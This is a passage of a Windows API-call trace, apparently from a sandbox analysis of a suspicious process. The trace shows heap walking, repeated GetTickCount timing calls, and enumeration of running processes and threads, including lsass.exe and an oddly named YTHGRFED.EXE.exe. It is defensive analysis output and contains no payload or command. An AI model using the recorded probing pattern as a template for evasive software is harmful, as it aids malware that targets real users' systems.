lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.172] Heap32Next (lphe=0x39aefc0) returned 1 [0234.192] GetTickCount () returned 0x11409d1 [0234.192] GetCurrentThreadId () returned 0x5b4 [0234.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.192] Heap32Next (lphe=0x39aefc0) returned 1 [0234.209] GetTickCount () returned 0x11409e0 [0234.209] GetCurrentThreadId () returned 0x5b4 [0234.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.209] Heap32Next (lphe=0x39aefc0) returned 1 [0234.229] GetTickCount () returned 0x1140a00 [0234.229] GetCurrentThreadId () returned 0x5b4 [0234.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.229] Heap32Next (lphe=0x39aefc0) returned 1 [0234.247] GetTickCount () returned 0x1140a0f [0234.247] GetCurrentThreadId () returned 0x5b4 [0234.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.247] Heap32Next (lphe=0x39aefc0) returned 1 [0234.265] GetTickCount () returned 0x1140a1f [0234.265] GetCurrentThreadId () returned 0x5b4 [0234.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.265] Heap32Next (lphe=0x39aefc0) returned 1 [0234.283] GetTickCount () returned 0x1140a2e [0234.283] GetCurrentThreadId () returned 0x5b4 [0234.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.283] Heap32Next (lphe=0x39aefc0) returned 1 [0234.301] GetTickCount () returned 0x1140a3e [0234.301] GetCurrentThreadId () returned 0x5b4 [0234.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.301] Heap32Next (lphe=0x39aefc0) returned 1 [0234.323] GetTickCount () returned 0x1140a5d [0234.323] GetCurrentThreadId () returned 0x5b4 [0234.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.323] Heap32Next (lphe=0x39aefc0) returned 1 [0234.362] GetTickCount () returned 0x1140a7c [0234.376] GetCurrentThreadId () returned 0x5b4 [0234.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.393] Heap32Next (lphe=0x39aefc0) returned 1 [0234.457] GetTickCount () returned 0x1140aca [0234.457] GetCurrentThreadId () returned 0x5b4 [0234.458] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.458] Heap32Next (lphe=0x39aefc0) returned 1 [0234.482] GetTickCount () returned 0x1140aea [0234.482] GetCurrentThreadId () returned 0x5b4 [0234.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.482] Heap32Next (lphe=0x39aefc0) returned 1 [0234.507] GetTickCount () returned 0x1140b09 [0234.507] GetCurrentThreadId () returned 0x5b4 [0234.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.507] Heap32Next (lphe=0x39aefc0) returned 1 [0234.532] GetTickCount () returned 0x1140b18 [0234.532] GetCurrentThreadId () returned 0x5b4 [0234.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.533] Heap32Next (lphe=0x39aefc0) returned 1 [0234.577] GetTickCount () returned 0x1140b47 [0234.577] GetCurrentThreadId () returned 0x5b4 [0234.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.577] Heap32Next (lphe=0x39aefc0) returned 1 [0234.605] GetTickCount () returned 0x1140b66 [0234.605] GetCurrentThreadId () returned 0x5b4 [0234.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.605] Heap32Next (lphe=0x39aefc0) returned 1 [0234.633] GetTickCount () returned 0x1140b86 [0234.633] GetCurrentThreadId () returned 0x5b4 [0234.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.634] Heap32Next (lphe=0x39aefc0) returned 1 [0234.661] GetTickCount () returned 0x1140b95 [0234.661] GetCurrentThreadId () returned 0x5b4 [0234.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.661] Heap32Next (lphe=0x39aefc0) returned 1 [0234.689] GetTickCount () returned 0x1140bb4 [0234.689] GetCurrentThreadId () returned 0x5b4 [0234.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.689] Heap32Next (lphe=0x39aefc0) returned 1 [0234.726] GetTickCount () returned 0x1140be3 [0234.726] GetCurrentThreadId () returned 0x5b4 [0234.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.726] Heap32Next (lphe=0x39aefc0) returned 1 [0234.752] GetTickCount () returned 0x1140bf3 [0234.752] GetCurrentThreadId () returned 0x5b4 [0234.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.752] Heap32Next (lphe=0x39aefc0) returned 1 [0234.779] GetTickCount () returned 0x1140c12 [0234.779] GetCurrentThreadId () returned 0x5b4 [0234.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.779] Heap32Next (lphe=0x39aefc0) returned 1 [0234.805] GetTickCount () returned 0x1140c31 [0234.805] GetCurrentThreadId () returned 0x5b4 [0234.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.805] Heap32Next (lphe=0x39aefc0) returned 1 [0234.830] GetTickCount () returned 0x1140c41 [0234.830] GetCurrentThreadId () returned 0x5b4 [0234.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.830] Heap32Next (lphe=0x39aefc0) returned 1 [0234.870] GetTickCount () returned 0x1140c70 [0234.870] GetCurrentThreadId () returned 0x5b4 [0234.870] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.870] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.870] Heap32Next (lphe=0x39aefc0) returned 1 [0234.895] GetTickCount () returned 0x1140c7f [0234.895] GetCurrentThreadId () returned 0x5b4 [0234.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.895] Heap32Next (lphe=0x39aefc0) returned 1 [0234.920] GetTickCount () returned 0x1140c9e [0234.920] GetCurrentThreadId () returned 0x5b4 [0234.920] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.921] Heap32Next (lphe=0x39aefc0) returned 1 [0234.946] GetTickCount () returned 0x1140cbe [0234.946] GetCurrentThreadId () returned 0x5b4 [0234.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.946] Heap32Next (lphe=0x39aefc0) returned 1 [0234.971] GetTickCount () returned 0x1140ccd [0234.971] GetCurrentThreadId () returned 0x5b4 [0234.971] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.971] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.971] Heap32Next (lphe=0x39aefc0) returned 1 [0234.996] GetTickCount () returned 0x1140cec [0234.996] GetCurrentThreadId () returned 0x5b4 [0234.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0234.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0234.997] Heap32Next (lphe=0x39aefc0) returned 1 [0235.021] GetTickCount () returned 0x1140cfc [0235.021] GetCurrentThreadId () returned 0x5b4 [0235.021] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.021] Heap32Next (lphe=0x39aefc0) returned 1 [0235.046] GetTickCount () returned 0x1140d1b [0235.046] Heap32ListNext (hSnapshot=0x654, lphl=0x39af454) returned 1 [0235.047] GetTickCount () returned 0x1140d1b [0235.047] GetTickCount () returned 0x1140d1b [0235.047] Process32First (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.048] GetCurrentThreadId () returned 0x5b4 [0235.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.048] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0235.049] GetTickCount () returned 0x1140d1b [0235.049] GetCurrentThreadId () returned 0x5b4 [0235.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.049] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0235.050] GetTickCount () returned 0x1140d1b [0235.051] GetCurrentThreadId () returned 0x5b4 [0235.051] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.051] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.052] GetTickCount () returned 0x1140d1b [0235.052] GetCurrentThreadId () returned 0x5b4 [0235.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.052] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.052] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0235.053] GetTickCount () returned 0x1140d1b [0235.053] GetCurrentThreadId () returned 0x5b4 [0235.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.053] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0235.054] GetTickCount () returned 0x1140d2b [0235.054] GetCurrentThreadId () returned 0x5b4 [0235.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.054] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0235.055] GetTickCount () returned 0x1140d2b [0235.055] GetCurrentThreadId () returned 0x5b4 [0235.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.055] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0235.056] GetTickCount () returned 0x1140d2b [0235.056] GetCurrentThreadId () returned 0x5b4 [0235.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.057] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0235.058] GetTickCount () returned 0x1140d2b [0235.058] GetCurrentThreadId () returned 0x5b4 [0235.058] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.058] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0235.059] GetTickCount () returned 0x1140d2b [0235.059] GetCurrentThreadId () returned 0x5b4 [0235.059] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.059] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.059] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.060] GetTickCount () returned 0x1140d2b [0235.060] GetCurrentThreadId () returned 0x5b4 [0235.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.060] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.061] GetTickCount () returned 0x1140d2b [0235.061] GetCurrentThreadId () returned 0x5b4 [0235.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.061] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.062] GetTickCount () returned 0x1140d2b [0235.062] GetCurrentThreadId () returned 0x5b4 [0235.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.062] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.063] GetTickCount () returned 0x1140d2b [0235.063] GetCurrentThreadId () returned 0x5b4 [0235.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.063] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.064] GetTickCount () returned 0x1140d2b [0235.064] GetCurrentThreadId () returned 0x5b4 [0235.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.065] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0235.066] GetTickCount () returned 0x1140d2b [0235.066] GetCurrentThreadId () returned 0x5b4 [0235.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.066] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.067] GetTickCount () returned 0x1140d2b [0235.067] GetCurrentThreadId () returned 0x5b4 [0235.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.067] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.068] GetTickCount () returned 0x1140d2b [0235.068] GetCurrentThreadId () returned 0x5b4 [0235.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.068] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0235.069] GetTickCount () returned 0x1140d3a [0235.069] GetCurrentThreadId () returned 0x5b4 [0235.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.069] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0235.070] GetTickCount () returned 0x1140d3a [0235.070] GetCurrentThreadId () returned 0x5b4 [0235.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.070] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0235.071] GetTickCount () returned 0x1140d3a [0235.071] GetCurrentThreadId () returned 0x5b4 [0235.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.071] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0235.072] GetTickCount () returned 0x1140d3a [0235.072] GetCurrentThreadId () returned 0x5b4 [0235.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.072] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0235.073] GetTickCount () returned 0x1140d3a [0235.073] GetCurrentThreadId () returned 0x5b4 [0235.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.073] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x488, pcPriClassBase=13, dwFlags=0x0, szExeFile="YTHGRFED.EXE.exe")) returned 1 [0235.074] GetTickCount () returned 0x1140d3a [0235.074] GetCurrentThreadId () returned 0x5b4 [0235.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.074] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0235.075] GetTickCount () returned 0x1140d3a [0235.075] GetCurrentThreadId () returned 0x5b4 [0235.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.075] Process32Next (in: hSnapshot=0x654, lppe=0x39af258 | out: lppe=0x39af258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0235.076] GetTickCount () returned 0x1140d3a [0235.076] Thread32First (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.077] GetCurrentThreadId () returned 0x5b4 [0235.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.077] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.078] GetTickCount () returned 0x1140d3a [0235.078] GetCurrentThreadId () returned 0x5b4 [0235.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.078] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.079] GetTickCount () returned 0x1140d3a [0235.079] GetCurrentThreadId () returned 